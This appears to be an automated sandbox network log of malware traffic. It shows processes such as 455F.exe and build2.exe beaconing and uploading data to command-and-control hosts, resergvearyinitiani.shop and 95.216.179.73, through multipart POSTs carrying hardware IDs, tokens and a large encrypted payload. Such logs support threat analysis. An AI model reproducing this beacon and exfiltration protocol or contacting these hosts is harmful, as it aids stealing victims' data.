2024-04-04 15:49:20 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49761	142.250.217.238	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:18 UTC	211	OUT	GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com
2024-04-04 15:49:19 UTC	978	IN	HTTP/1.1 403 Forbidden Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 04 Apr 2024 15:49:19 GMT Content-Type: text/html; charset=utf-8 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt Referrer-Policy: origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=512=WUI-UerPWezsfoz3j1VI-ImGAl-k6n7rrVx_ERgBMHWGYIb5tt8HnUgZ61qbFvKOWeN6q9Cea-8i1e4ypmYmRcl1mpb9ksFif3ujk97iSKO4jcBBRjr4KBrYE-vyVv3EqIMULeeaAbK9q0Mp2JfbpyfSGt9wLRSRLf4BkuwKaFM; expires=Fri, 04-Oct-2024 15:49:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-04 15:49:19 UTC	274	IN	Data Raw: 62 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 62 20 77 6f 72 64 20 70 72 6f 63 65 73 73 69 6e 67 2c 20 70 72 65 73 65 6e 74 61 74 69 6f 6e 73 20 61 6e 64 20 73 70 72 65 61 64 73 68 65 65 74 73 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c Data Ascii: b07<!DOCTYPE html><html lang="en"><head><meta name="description" content="Web word processing, presentations and spreadsheets"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0"><
2024-04-04 15:49:19 UTC	1252	IN	Data Raw: 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 72 6f 64 75 63 74 2b 53 61 6e 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 2d 74 65 4b 45 78 66 71 33 4b 65 42 4c 6c 6f 56 37 33 58 62 4b 67 22 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 74 65 4b 45 78 66 71 33 4b 65 42 4c 6c 6f Data Ascii: icon" href="//docs.google.com/favicon.ico"><title>Error</title><meta name="referrer" content="origin"><link href="//fonts.googleapis.com/css?family=Product+Sans" rel="stylesheet" type="text/css" nonce="-teKExfq3KeBLloV73XbKg"><style nonce="-teKExfq3KeBLlo
2024-04-04 15:49:19 UTC	1252	IN	Data Raw: 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 2d 74 65 4b 45 78 66 71 33 4b 65 42 4c 6c 6f 56 37 33 58 62 4b 67 22 3e 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 61 2c 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 31 31 32 41 42 42 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 2d 74 65 4b 45 78 66 71 33 4b 65 42 4c 6c 6f 56 37 33 58 62 4b 67 Data Ascii: e><style type="text/css" nonce="-teKExfq3KeBLloV73XbKg">body {background-color: #fff; font-family: Arial,sans-serif; font-size: 13px; margin: 0; padding: 0;}a, a:link, a:visited {color: #112ABB;}</style><style type="text/css" nonce="-teKExfq3KeBLloV73XbKg
2024-04-04 15:49:19 UTC	52	IN	Data Raw: 67 69 6e 2d 74 6f 70 3a 20 38 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: gin-top: 80px; position: relative;}</style></html>
2024-04-04 15:49:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49762	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:19 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: resergvearyinitiani.shop
2024-04-04 15:49:19 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 35 37 46 46 39 32 44 38 31 41 30 33 30 30 33 42 46 33 37 30 33 33 46 39 46 36 35 45 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E7657FF92D81A03003BF37033F9F65E2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-04-04 15:49:19 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 Data Ascii: `?lpQ0/74G6(~
2024-04-04 15:49:19 UTC	808	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=35bjtlvrtujbcguh8044n797ru; expires=Mon, 29-Jul-2024 09:35:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t0hVo1RDauF1AA1EYiW5ylKEpZtWIZhTpHz7QfbQbi8nN%2FXQd%2FadvXTfvMC5sMvrQrWBqIFT9XXr1BxbzJHfDjRrjBt8PF0FmU5Q22iypjstAwMahA5xWJIXfhncWo4uc4hfEGkjLABi28Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2729bed8d7420-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:19 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 0d 0a Data Ascii: 12ok 102.129.152.231
2024-04-04 15:49:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49767	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:20 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1280 Host: resergvearyinitiani.shop
2024-04-04 15:49:20 UTC	1280	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 35 37 46 46 39 32 44 38 31 41 30 33 30 30 33 42 46 33 37 30 33 33 46 39 46 36 35 45 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E7657FF92D81A03003BF37033F9F65E2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-04-04 15:49:21 UTC	808	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l608mlpkcnkakf9etb6j006rbn; expires=Mon, 29-Jul-2024 09:36:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zs%2Ft6b1lGTiFR4c4fJ8QUTX6LRkmxjtw13QGSvaGFgzoK0hYdEB2ZZkJPMpPL3w4Y4qVbTSVGZIY29JOoqwheFONYGSJ2ueNiXZpDzJzxLUnRYuAw0A9l3cP5NUEArV%2Bgve5Ux1VlYMC4vo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f272a5ffc8a4c4-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:21 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 0d 0a Data Ascii: 12ok 102.129.152.231
2024-04-04 15:49:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49769	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:22 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:22 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------CAAAAFBKFIECAAKECGCACont
2024-04-04 15:49:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:23 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49771	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:22 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549452 Host: resergvearyinitiani.shop
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 35 37 46 46 39 32 44 38 31 41 30 33 30 30 33 42 46 33 37 30 33 33 46 39 46 36 35 45 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E7657FF92D81A03003BF37033F9F65E2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 1e 40 71 d2 5a b6 47 2b 0a e2 36 2f e5 e1 42 a2 37 84 53 3f ec bb de 7c 5f 00 8d c7 48 7f 00 6d 61 c6 66 c1 be 8a e9 2d 98 9c 6b 24 4b 88 e4 18 08 42 78 03 89 a9 ad 2a d5 bd c2 39 20 61 61 98 39 fe e5 1a cf 4b e9 c3 97 df 62 ea 2b 54 af 34 9b 64 52 c8 1e e8 57 3b 34 a0 26 fd f7 e3 e3 ed 62 71 dd 41 0c e9 e5 73 ec 2c aa 46 70 57 33 e0 4d ea 62 66 55 b8 72 81 cb 5c 79 44 6d 2e 18 b7 3c 52 fd 65 ce 87 15 5d c1 77 c8 22 8a a4 9c 5e 0e ce ee 3c 32 49 8e 01 c4 43 8c a0 ed a1 d0 73 e8 e6 f6 6e 75 57 c8 54 12 dc 6e ed ae 9f c0 78 a5 fc 81 b7 30 cf 68 01 82 87 18 ee 9e 4a 97 14 be 18 e1 59 e0 7b 98 77 0b 9a 02 6b fd 1d 98 8f c1 4c 7c ae 3e 77 7b 5f 36 56 99 c0 af 85 72 57 a0 63 fc 93 84 9a 5a f3 d3 2d 4d a8 2a a0 69 32 4f 1b 7f ce 5d 32 ae 68 4d 8c 65 22 5b f5 53 Data Ascii: @qZG+6/B7S?\|_Hmaf-k$KBx9 aa9Kb+T4dRW;4&bqAs,FpW3MbfUr\yDm.<Re]w"^<2ICsnuWTnx0hJY{wkL\|>w{_6VrWcZ-Mi2O]2hMe"[S
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: fe 07 bc a5 9d 75 ee c1 2e ed ea 09 ad 7e 38 e1 f7 43 ce 52 3f 68 94 fa b0 7b 65 5a 36 97 d2 2f 64 06 7e 05 23 16 90 09 60 9c e9 10 56 7d 80 3a 8e c6 db 43 f7 8e 3d c5 76 13 48 b3 e2 a0 81 44 f5 7e d7 f4 e3 a6 32 fe c2 7a 2a ee 81 ab f8 0f 4e d5 d5 b2 8d 56 07 a7 52 cf 3d 9b b9 ff fa 25 76 be 9b aa 4a c7 77 b8 e1 30 c5 02 dc 37 70 e0 3f 21 35 af de 93 f2 6b a0 5d 82 9c 9a 85 3f dc 0e 60 61 75 9d f3 3c 1d a7 cf ad 6f 9d 03 5f 9f 79 57 8e f9 42 25 fd 37 1b f4 f8 23 b9 ee e8 a2 9b 49 aa 53 5f 40 e8 a5 81 16 f1 17 a3 6d 1f a3 7f 08 25 05 79 5d 52 14 ba e8 9a 6e 16 be 5f 80 ef cb e5 ba de d5 b7 9a a8 95 00 5f e2 45 43 9a 80 50 1d 1c 2c 7a 63 29 af 85 7b 2e 8b da 2c 71 bd 2f 82 5f c8 a5 15 67 9d 5e 23 82 b7 80 26 a1 ef c3 d1 81 0f 58 23 f2 3b 19 f5 cf 58 7b 27 Data Ascii: u.~8CR?h{eZ6/d~#`V}:C=vHD~2z*NVR=%vJw07p?!5k]?`au<o_yWB%7#IS_@m%y]Rn__ECP,zc){.,q/_g^#&X#;X{'
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 7a 73 dc 6e 20 da a1 ae e8 46 7d 1e 91 73 e4 a8 56 82 07 4f c3 3d 5f f4 f7 15 77 05 12 49 21 35 02 a6 95 96 99 3b d2 e3 fb c3 1c c6 75 02 d2 8e ec 2a 92 a4 57 ec e5 7b 36 92 a8 83 24 d4 a5 fd 49 4d 32 e4 f8 cd f3 bd 96 4d 8d bd 05 03 f6 9e b8 f4 7b 6d d0 45 61 2d 53 6a 0a bf c7 17 e3 ae 96 1e af d9 0c 03 dc 41 39 07 4f 90 7e cf b9 71 88 5a 4e 86 0f 37 ef e9 a7 9d 6f 4f 41 e7 e0 56 8e a7 9c 07 81 70 84 37 d7 b7 9a 1c 01 46 af 8c 69 84 c9 ec 3b 1d 08 12 3d 58 2e ed 0b ed df 31 84 a1 e5 c5 e9 8a d2 cc fc 1f 0e e4 01 77 5e 0b af e9 82 2a 7b d9 98 0d f7 8b 94 c4 6b 64 07 e1 89 e7 44 02 75 ee 73 a6 f6 d6 71 fe 5a a9 03 7a 90 20 55 6f 3d bd a9 a0 71 96 73 5a 6f d8 c0 b1 20 63 c9 f6 2c df 05 51 38 13 54 d7 84 65 f0 fc 03 ec b8 38 57 74 40 c6 97 71 6c f7 63 7a 8e Data Ascii: zsn F}sVO=_wI!5;uW{6$IM2M{mEa-SjA9O~qZN7oOAVp7Fi;=X.1w^{kdDusqZz Uo=qsZo c,Q8Te8Wt@qlcz
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 8d c4 f8 d9 e0 5f b8 43 65 07 1d ec 73 76 7d d9 4a ea b3 6e bd 44 27 99 66 58 44 0e b0 5f 2e 90 eb 3a 0f b9 5d a8 05 70 54 34 08 8d 0a 77 fc 24 bf 97 ab d9 73 29 8c b0 db 17 ea 2c 2e bb 41 ee da cd 07 ad 0a 76 17 f5 9a 43 4e 23 8e 6b e5 21 b5 a6 06 18 1f 82 5e 5c 46 47 50 5b 98 c0 2e 21 b9 6f 27 ad ec 72 af 32 a4 b6 de 2d 6d e7 99 db 38 d2 a6 56 4f f5 ba bb a3 bf fd 70 bf 63 ac a7 83 a8 5b 6e ae 83 6f 0d c9 6c 24 b4 e7 4b ad ed 19 55 9c af 33 a9 21 c9 d2 4a d7 23 e7 8e ff 7d bf 30 1e f7 f1 9d c8 bc 60 59 f4 79 ff ab 15 c9 f0 f1 1a b9 0c a4 e6 7d dd d6 4a e8 32 be ba 19 dd d5 12 ab 3a 5c e7 b7 d1 f1 28 ce 17 24 88 e1 63 fa a3 89 63 cb 45 45 3d b5 46 b0 49 ad 49 43 98 24 7f 43 33 59 9d 8b 2e 82 5f f4 52 c4 b3 1b 9a b0 7a 7d 74 67 d1 4c b1 9f 05 10 73 02 50 Data Ascii: _Cesv}JnD'fXD_.:]pT4w$s),.AvCN#k!^\FGP[.!o'r2-m8VOpc[nol$KU3!J#}0`Yy}J2:\($ccEE=FIIC$C3Y._Rz}tgLsP
